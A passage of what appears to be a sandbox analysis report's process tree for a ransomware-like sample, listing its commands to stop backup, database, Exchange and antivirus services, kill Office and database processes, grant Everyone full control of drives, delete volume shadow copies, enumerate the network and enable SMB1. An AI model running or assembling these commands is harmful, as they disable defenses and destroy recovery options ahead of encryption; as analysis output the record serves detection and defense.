PID:6692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
4⤵
PID:14700

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
3⤵
PID:6676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
4⤵
PID:14204

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PROD /y
3⤵
PID:6668

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
4⤵
PID:14668

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
3⤵
PID:6660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
4⤵
PID:14140

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Web Control Service” /y
3⤵
PID:6652

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
4⤵
PID:14212

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTTICEBGC /y
3⤵
PID:6644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
4⤵
PID:14132

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6956

C:\Windows\SysWOW64\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:7372

C:\Windows\SysWOW64\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:7336

C:\Windows\SysWOW64\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:7288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:7068

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9280

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9272

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9264

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9256

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9244

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9236

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9228

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9220

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7448

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7404

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM winword.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7364

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7324

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM visio.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7276

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5852

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5764

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7152

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7124

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7060

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7028

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6996

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6964

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6920

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6888

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6840

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6808

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
3⤵
- Kills process with taskkill
PID:9204

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9196

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9188

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9180

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9172

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9164

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9156

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9148

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9132

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9124

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9116

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9108

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9092

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9084

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9076

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9068

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9052

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9044

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9036

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9028

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9012

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net view
3⤵
PID:8940

C:\Windows\SysWOW64\net.exe
net view
4⤵
- Discovers systems in the same network
PID:16504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
3⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:8932

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
3⤵
PID:7920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
4⤵
PID:14452

C:\Windows\SysWOW64\net.exe
"net.exe" stop EsgShKernel /y
3⤵
PID:7912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
4⤵
PID:14444

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPSAMA /y
3⤵
PID:7904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
4⤵
PID:14460

C:\Windows\SysWOW64\net.exe
"net.exe" stop ntrtscan /y
3⤵
PID:7896

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
4⤵
PID:14468

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPUpdateService /y
3⤵
PID:7888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
4⤵
PID:14484

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPS /y
3⤵
PID:7880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
4⤵
PID:14476

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:7872

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
4⤵
PID:14856

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPSecurityService /y
3⤵
PID:7864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
4⤵
PID:14492

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDeviceMediaService /y
3⤵
PID:6608

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
4⤵
PID:14156

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos System Protection Service” /y
3⤵
PID:6592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
4⤵
PID:14164

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$PRACTICEMGT /y
3⤵
PID:6584

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
4⤵
PID:14188

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
3⤵
PID:6576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
4⤵
PID:14180

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Safestore Service” /y
3⤵
PID:6568

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
4⤵
PID:14172

C:\Windows\SysWOW64\net.exe
"net.exe" stop audioendpointbuilder /y
3⤵
PID:6560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
4⤵
PID:14692

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$ECWDB2 /y
3⤵
PID:6552

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
4⤵
PID:14196

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
3⤵
PID:6536

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
4⤵
PID:14660

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Message Router” /y
3⤵
PID:6528

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
4⤵
PID:14652

C:\Windows\SysWOW64\net.exe
"net.exe" stop unistoresvc_1af40a /y
3⤵
PID:6520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
4⤵
PID:14676

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$BKUPEXEC /y
3⤵
PID:6512

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
4⤵
PID:14708

C:\Windows\SysWOW64\net.exe
"net.exe" stop ARSM /y
3⤵
PID:6504

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
4⤵
PID:14872

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Client” /y
3⤵
PID:6496

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
4⤵
PID:15168

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeimap4 /y
3⤵
PID:6480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
4⤵
PID:14848

C:\Windows\SysWOW64\net.exe
"net.exe" stop “intel(r) proset monitoring service” /y
3⤵
PID:6464

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
4⤵
PID:14324

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPSAMA /y
3⤵
PID:6456

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
4⤵
PID:14388

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
3⤵
PID:6448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
4⤵
PID:14380

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos MCS Agent” /y
3⤵
PID:6440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
4⤵
PID:14328

C:\Windows\SysWOW64\net.exe
"net.exe" stop msexchangeadtopology /y
3⤵
PID:6432

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
4⤵
PID:14396

C:\Windows\SysWOW64\net.exe
"net.exe" stop “aphidmonitorservice” /y
3⤵
PID:6424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
4⤵
PID:14404

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPS /y
3⤵
PID:6416

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
4⤵
PID:14340

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Zoolz 2 Service” /y
3⤵
PID:6408

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
4⤵
PID:14412

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPSAMA /y
3⤵
PID:6384

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
4⤵
PID:14428

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Health Service” /y
3⤵
PID:6328

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
4⤵
PID:14148

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSRS /y
3⤵
PID:6320

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
4⤵
PID:14108

C:\Windows\SysWOW64\net.exe
"net.exe" stop W3Svc /y
3⤵
PID:6312

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
4⤵
PID:14124

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SYSTEM_BGC /y
3⤵
PID:6304

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
4⤵
PID:14116

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Veeam Backup Catalog Data Service” /y
3⤵
PID:6288

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
4⤵
PID:14092

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPS /y
3⤵
PID:6280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
4⤵
PID:14100

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos File Scanner Service” /y
3⤵
PID:6264

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
4⤵
PID:14084

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSA /y
3⤵
PID:6248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
4⤵
PID:14076

C:\Windows\SysWOW64\net.exe
"net.exe" stop UI0Detect /y
3⤵
PID:6240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
4⤵
PID:14060

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SQL_2008 /y
3⤵
PID:6232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
4⤵
PID:14068

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Symantec System Recovery” /y
3⤵
PID:6224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
4⤵
PID:14052

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SYSTEM_BGC /y
3⤵
PID:6216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
4⤵
PID:14036

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Device Control Service” /y
3⤵
PID:6208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
4⤵
PID:14020

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMTA /y
3⤵
PID:6200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
4⤵
PID:14044

C:\Windows\SysWOW64\net.exe
"net.exe" stop SstpSvc /y
3⤵
PID:6192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
4⤵
PID:14028

C:\Windows\SysWOW64\net.exe
"net.exe" stop msftesql$PROD /y
3⤵
PID:6176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
4⤵
PID:14004

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Filter Service” /y
3⤵
PID:6168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
4⤵
PID:14012

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
3⤵
PID:6160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
4⤵
PID:13996

C:\Windows\SysWOW64\net.exe
"net.exe" stop SMTPSvc /y
3⤵
PID:6152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
4⤵
PID:13980

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Clean Service” /y
3⤵
PID:4868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
4⤵
PID:13972

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMGMT /y
3⤵
PID:1332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
4⤵
PID:13988

C:\Windows\SysWOW64\net.exe
"net.exe" stop POP3Svc /y
3⤵
PID:6140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
4⤵
PID:13948

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer110 /y
3⤵
PID:6132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
4⤵
PID:13964

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Backup Service” /y
3⤵
PID:6124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
4⤵
PID:13956

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer /y
3⤵
PID:6116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
4⤵
PID:13932

C:\Windows\SysWOW64\net.exe
"net.exe" stop SamSs /y
3⤵
PID:6056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
4⤵
PID:13940

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos AutoUpdate Service” /y
3⤵
PID:6040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
4⤵
PID:13924

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeIS /y
3⤵
PID:6032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
4⤵
PID:13908

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetMsmqActivator /y
3⤵
PID:6016

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
4⤵
PID:14292

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer100 /y
3⤵
PID:6008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
4⤵
PID:13900

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQL Backups /y
3⤵
PID:6000

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
4⤵
PID:13916

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Enterprise Client Service” /y
3⤵
PID:5992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
4⤵
PID:13264

C:\Windows\SysWOW64\net.exe
"net.exe" stop EraserSvc11710 /y
3⤵
PID:5984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
4⤵
PID:13828

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Agent” /y
3⤵
PID:5976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
4⤵
PID:14372

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeES /y
3⤵
PID:5968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
4⤵
PID:13884

C:\Windows\SysWOW64\net.exe
"net.exe" stop IISAdmin /y
3⤵
PID:5960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
4⤵
PID:12908

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer /y
3⤵
PID:5952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
4⤵
PID:12888

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Acronis VSS Provider” /y
3⤵
PID:5944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
4⤵
PID:13836

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
3⤵
PID:5928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
4⤵
PID:12904

C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
3⤵
PID:5920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
4⤵
PID:12880

C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
3⤵
PID:5904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
4⤵
PID:13844

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
3⤵
PID:5896

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
3⤵
PID:5880

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
3⤵
PID:5872

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
3⤵
PID:5856

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
3⤵
PID:5840

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
4⤵
PID:13868

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
3⤵
PID:5832

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
4⤵
PID:13852

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
3⤵
PID:5824

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
4⤵
PID:13860

C:\Windows\SysWOW64\net.exe
"net.exe" stop vapiendpoint /y
3⤵
PID:5816

C:\Windows\SysWOW64\net.exe
"net.exe" stop mssql$vim_sqlexp /y
3⤵
PID:5800

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
4⤵
PID:13892

C:\Windows\SysWOW64\net.exe
"net.exe" stop WRSVC /y
3⤵
PID:5792

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY$ECWDB2 /y
3⤵
PID:5776

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
4⤵
PID:13876

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyServiceHelper /y
3⤵
PID:5768

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLTELEMETRY /y
3⤵
PID:5752

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKeyScheduler /y
3⤵
PID:5736

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSERVERAGENT /y
3⤵
PID:5728

C:\Windows\SysWOW64\net.exe
"net.exe" stop TrueKey /y
3⤵
PID:5720

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLSafeOLRService /y
3⤵
PID:5712

C:\Windows\SysWOW64\net.exe
"net.exe" stop tmlisten /y
3⤵
PID:5704

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLBrowser /y
3⤵
PID:5696

C:\Windows\SysWOW64\net.exe
"net.exe" stop TmCCSF /y
3⤵
PID:5688

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2012 /y
3⤵
PID:5680

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update_64 /y
3⤵
PID:5672

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:5664

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_update /y
3⤵
PID:5656

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPSAMA /y
3⤵
PID:5648

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_service /y
3⤵
PID:5640

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$TPS /y
3⤵
PID:5628

C:\Windows\SysWOW64\net.exe
"net.exe" stop swi_filter /y
3⤵
PID:5620

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$SYSTEM_BGC /y
3⤵
PID:5612

